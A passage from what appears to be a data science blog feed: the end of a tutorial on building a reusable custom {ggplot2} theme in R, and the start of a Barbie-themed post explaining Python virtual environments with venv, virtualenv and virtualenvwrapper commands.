&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;plot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lato&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;, margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;margin&lt;/span&gt;(b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# modify title-plot spacing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;margin&lt;/span&gt;(t &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;) &lt;span style="color:#8b949e;font-style:italic"&gt;# modify x axis-legend spacing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/margin.png" alt="The same scatter plot as above (theme minimal, legend at bottom, grey axes, no grid lines, modified text, pale blue background) but there is now more space between the plot title and main plot, and the legend and the main plot." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Now this is our final plot! Each individual step made a minor adjustment to the plot, but added together, we have a plot with a much improved appearance.&lt;/p&gt;
&lt;h3 id="bringing-it-all-together"&gt;Bringing it all together&lt;/h3&gt;
&lt;p&gt;An important programming concept is don&amp;rsquo;t repeat yourself (DRY). This applies to constructing graphics as well. We don&amp;rsquo;t want to copy and paste our theme for every plot we make. The great thing about {ggplot2} themes is that they can be effortlessly applied to basically any plot. All we have to do is turn our theme into a function, and then it can be used just like any of the &amp;ldquo;built in&amp;rdquo; {ggplot2} themes. For example:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_theme &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(){
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme_minimal&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;theme&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.position &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bottom&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; axis.line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_line&lt;/span&gt;(colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;grey50&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; panel.grid &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_blank&lt;/span&gt;(),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; text &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(family &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;lato&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.title &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_text&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; hjust &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;0.5&lt;/span&gt;, size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;18&lt;/span&gt;, margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;margin&lt;/span&gt;(b &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;30&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; plot.background &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;element_rect&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;, colour &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#dffffc&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; legend.margin &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;margin&lt;/span&gt;(t &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;15&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Notice that the first line of the function is &lt;code&gt;theme_minimal()&lt;/code&gt;; we used this theme as a starting point for our custom theme.&lt;/p&gt;
&lt;p&gt;Then we can apply this to any other plot as we would apply a standard {ggplot2} theme:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_boxplot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;drop_na&lt;/span&gt;() &lt;span style="color:#ff7b72;font-weight:bold"&gt;%&amp;gt;%&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggplot&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;aes&lt;/span&gt;(x &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; species, y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; flipper_length_mm)) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;geom_boxplot&lt;/span&gt;(fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#ff9300&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;xlab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Species&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ylab&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Flipper length (mm)&amp;#34;&lt;/span&gt;) &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;ggtitle&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;Which type of penguin has the longest flippers?&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;my_boxplot &lt;span style="color:#ff7b72;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;my_theme&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="graphics/boxplot.png" alt="A boxplot (vertical arrangement) with penguin flipper length (mm) on the y axis and species on x axis. Adelie penguins have median 190 and (LQ, UQ) = (185, 195). Chinstrap penguins have median 195 and (LQ, UQ) = (190, 200). Gentoo penguins have median 215 and (LQ, UQ) = (210, 220)." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;That was easy! We can just add &lt;code&gt;my_theme()&lt;/code&gt; to all of our plots to ensure consistent styling. If we want to make minor adjustments to the theme for a specific plot, we can add another &lt;code&gt;theme()&lt;/code&gt; call after &lt;code&gt;my_theme()&lt;/code&gt; and make the required adjustments there.
If you want to apply the style to all plots in a single script or report, &lt;code&gt;theme_set()&lt;/code&gt; is a really handy way to do this.&lt;/p&gt;
&lt;h3 id="what-next"&gt;What next?&lt;/h3&gt;
&lt;p&gt;The &lt;code&gt;theme()&lt;/code&gt; function has a lot of arguments, and it can feel overwhelming if you&amp;rsquo;re wanting to start modifying your own theme. We&amp;rsquo;ve managed to gain a little bit of experience with the tools that modify a {ggplot2} theme, and now you should have the confidence to modify other elements on your own, and try out the different arguments in &lt;code&gt;element_*()&lt;/code&gt; functions.&lt;/p&gt;
&lt;p&gt;If you&amp;rsquo;re wanting to explore what makes a really good chart, I&amp;rsquo;d recommend the &lt;a href="https://royal-statistical-society.github.io/datavisguide/" rel="external"&gt;RSS style guide&lt;/a&gt; for practical, actionable advice on constructing publication-ready graphics with examples in both R and Python. Cara Thompson gave the keynote talk at our 2023 edition of &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt;; her talk walked us through 10 important considerations for making text shine within a data visualisation, and her &lt;a href="https://www.cararthompson.com/talks/shiny-dynamic-annotations/" rel="external"&gt;slides&lt;/a&gt; are packed with ways to make your plots awesome.&lt;/p&gt;
&lt;p&gt;If you feel like going back to basics would really help you out, booking onto one of our upcoming &lt;a href="https://www.jumpingrivers.com/training/course/r-advanced-graphics-ggplot2-plotly-themes-scaling-faceting/" rel="external"&gt;Data Visualisation with {ggplot2}&lt;/a&gt; courses is a great way to get to grips with a wide variety of {ggplot2} features.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/intro-to-theme-ggplot2-r/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Python Virtual Environments and Barbie</title><link>https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/</link><pubDate>Thu, 16 Nov 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/python-virtual-environments-conda-poetry/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Having recently been to see the Barbie movie, it got us thinking: Barbie and Python have more things in common than meets the eye (step aside Ken!). For a start, they are both pioneers in their respective fields: Barbie is a famous fashion doll owned by millions of people around the globe, while Python is a famous programming language with millions of users worldwide. Barbie is well known for her wide range of careers, outfits and accessories. Meanwhile, Python comes in many different versions and has thousands of dedicated libraries and packages.&lt;/p&gt;
&lt;p&gt;Crucially, they are both &lt;strong&gt;customisable&lt;/strong&gt;. Barbie can be dressed in different outfits from her wardrobe to meet the demands of her busy schedule, whether that&amp;rsquo;s a day at the beach, governing her country, or kicking back for a quiet night in. With Python, meanwhile, we can customise our programming environment and switch between different combinations of packages and versions to tackle our data science projects. This is made possible through &lt;em&gt;virtual environments&lt;/em&gt;.&lt;/p&gt;
&lt;h2 id="what-is-a-virtual-environment"&gt;What is a virtual environment?&lt;/h2&gt;
&lt;p&gt;Virtual environments are tools used in software development to create isolated environments for different projects. These environments allow developers to manage dependencies and packages separately for each project. This helps avoid conflicts between different project requirements and keeps everything organised. Each virtual environment is like a contained space where you can install packages without affecting the global Python installation.&lt;/p&gt;
&lt;img src="py-versions.png" alt="Three depictions of the Python logo dressed up in different outfits. Under each logo is a box containing text, each showing a different Python version number and a unique combination of Python packages (such as NumPy) with different package versions." style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;While Barbie and Python virtual environments might seem unrelated at first glance, there are some similarities:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Customisation&lt;/strong&gt;: Just like how you can dress up Barbie in different outfits and accessories, you can customise each Python virtual environment with specific packages and dependencies tailored to the needs of your project.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Isolation&lt;/strong&gt;: Barbie&amp;rsquo;s different outfits don&amp;rsquo;t interfere with each other, just as Python virtual environments keep the dependencies of different projects separate, preventing conflicts.&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Organisation&lt;/strong&gt;: Barbie&amp;rsquo;s wardrobe allows her clothes to be neatly stored rather than strewn all over the floor. With Python virtual environments we can work with just the project-specific dependencies rather than hundreds of conflicting packages at once (never a good idea).&lt;/p&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Portability&lt;/strong&gt;: If you&amp;rsquo;re lucky enough to own multiple Barbies, you can try the same outfit on different Barbies. Similarly, with Python you can duplicate an environment to work on the same project across multiple machines and share it with your colleagues.&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Data comes in all shapes and sizes. It can often be difficult to know where to start. Whatever your problem, &lt;a href="https://www.jumpingrivers.com/consultancy/data-science-machine-learning/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-py-virtual-envs"&gt;Jumping Rivers can help&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="virtual-environment-managers"&gt;Virtual environment managers&lt;/h2&gt;
&lt;p&gt;There are a lot of virtual environment managers out there for Python. Below we will give a basic overview of some of the most popular options and share some useful links for more in-depth information.&lt;/p&gt;
&lt;p&gt;Note that some of these tools double as &lt;em&gt;package&lt;/em&gt; managers. For more on this, check out our recent blog on &lt;a href="https://www.jumpingrivers.com/blog/python-package-managers-pip-conda-poetry/" rel="external"&gt;Python package managers&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="venv"&gt;venv&lt;/h3&gt;
&lt;p&gt;Python&amp;rsquo;s standard library includes an easy-to-use, lightweight virtual environment module called venv. To create a virtual environment called &amp;ldquo;myenv&amp;rdquo;, you can run the following command:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;python -m venv myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will generate a folder within the current working directory called &amp;ldquo;myenv/&amp;rdquo; (you can call it whatever you like), which will be used to activate the virtual environment and store any packages that are installed into the environment.&lt;/p&gt;
&lt;p&gt;To activate the environment on Windows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-powershell" data-lang="powershell"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;myenv\Scripts\activate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;On macOS and Linux, you have to &lt;code&gt;source&lt;/code&gt; the activation script:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source myenv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once the environment is activated, the &lt;code&gt;pip install &amp;lt;pkg&amp;gt;&lt;/code&gt; command will install packages into the virtual environment, keeping them separate from the user&amp;rsquo;s &lt;em&gt;system&lt;/em&gt; environment. If you want to share your development environment with a colleague who&amp;rsquo;s working on the same project, you can run:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip freeze &amp;gt; requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This will create a file called &amp;ldquo;requirements.txt&amp;rdquo; containing a list of installed Python packages and their version numbers. Your colleague can then install these dependencies into their environment by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install -r requirements.txt
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;When you are finished with the environment, it can be deactivated by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;deactivate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;To delete the environment outright, simply delete the &amp;ldquo;myenv/&amp;rdquo; folder (or whatever you called it).&lt;/p&gt;
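&lt;p&gt;The same module can also be driven from Python itself. The sketch below is a rough illustration rather than a recommended workflow: it builds a throwaway environment in a temporary folder with &lt;code&gt;venv.create()&lt;/code&gt; and reads back the &lt;code&gt;pyvenv.cfg&lt;/code&gt; file that marks the folder as a virtual environment. The helper names &lt;code&gt;create_env&lt;/code&gt; and &lt;code&gt;read_config&lt;/code&gt; are made up for this example, and pip is deliberately left out so that it runs quickly and offline.&lt;/p&gt;

```python
import tempfile
import venv
from pathlib import Path


def create_env(parent_dir, name="myenv"):
    """Create a virtual environment, much like `python -m venv myenv`."""
    env_dir = Path(parent_dir) / name
    # with_pip=False is an assumption made for speed; the command-line
    # tool installs pip into the new environment by default.
    venv.create(env_dir, with_pip=False)
    return env_dir


def read_config(env_dir):
    """Parse the environment's pyvenv.cfg marker file into a dictionary."""
    config = {}
    for line in (env_dir / "pyvenv.cfg").read_text().splitlines():
        key, sep, value = line.partition("=")
        if sep:  # skip any line that is not a "key = value" pair
            config[key.strip()] = value.strip()
    return config


# The temporary folder (and the environment inside it) is removed on exit.
with tempfile.TemporaryDirectory() as tmp:
    env_dir = create_env(tmp)
    config = read_config(env_dir)

print("home:", config.get("home"))
print("version:", config.get("version"))
```

&lt;p&gt;The &lt;code&gt;home&lt;/code&gt; entry points at the Python installation the environment was created from, and &lt;code&gt;version&lt;/code&gt; records its release number. Because the environment is just a folder, removing that folder is all it takes to delete it.&lt;/p&gt;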
&lt;h3 id="virtualenv-and-virtualenvwrapper"&gt;virtualenv and virtualenvwrapper&lt;/h3&gt;
&lt;p&gt;Virtualenv is a third-party library that predates venv. If it&amp;rsquo;s installed with the virtualenvwrapper extension library, it can provide additional commands and features like quick switching between multiple environments. Virtualenv can be installed with pip:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install virtualenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can then use the &lt;code&gt;virtualenv&lt;/code&gt; command to create a virtual environment from the command line:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;virtualenv myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Activating and deactivating the environment is similar to venv. With a Unix shell the commands would be:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source myenv/bin/activate
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;deactivate
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and packages can again be installed or uninstalled using pip.&lt;/p&gt;
&lt;p&gt;Virtualenvwrapper is a set of extensions for virtualenv that simplify the management of multiple virtual environments. It provides commands to create, delete, and switch between virtual environments easily without having to explicitly state the environment file path. To get started with virtualenvwrapper, you&amp;rsquo;ll first need to install it using pip:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;pip install virtualenvwrapper
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;We then need to add the code below to the shell startup file (&lt;code&gt;~/.bashrc&lt;/code&gt;, &lt;code&gt;~/.zshrc&lt;/code&gt;, &lt;code&gt;~/.profile&lt;/code&gt;, etc.) to set the location where the virtual environments will be stored and to load the virtualenvwrapper commands (the path to &lt;code&gt;virtualenvwrapper.sh&lt;/code&gt; may differ on your system):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# Virtualenvwrapper settings:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;export &lt;span style="color:#79c0ff"&gt;WORKON_HOME&lt;/span&gt;&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;$HOME&lt;/span&gt;/.virtualenvs
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;source ~/.local/bin/virtualenvwrapper.sh
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;&lt;em&gt;Note that these commands are specific to the Unix shell. Windows users should investigate the &lt;a href="https://pypi.org/project/virtualenvwrapper-win/" rel="external"&gt;virtualenvwrapper-win package&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;In a new shell, you can now create a virtual environment and activate it as follows:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;mkvirtualenv myenv
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;workon myenv
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Virtualenvwrapper streamlines the management of virtual environments, making it especially useful when working on multiple Python projects simultaneously.&lt;/p&gt;
&lt;h3 id="pyenv"&gt;pyenv&lt;/h3&gt;
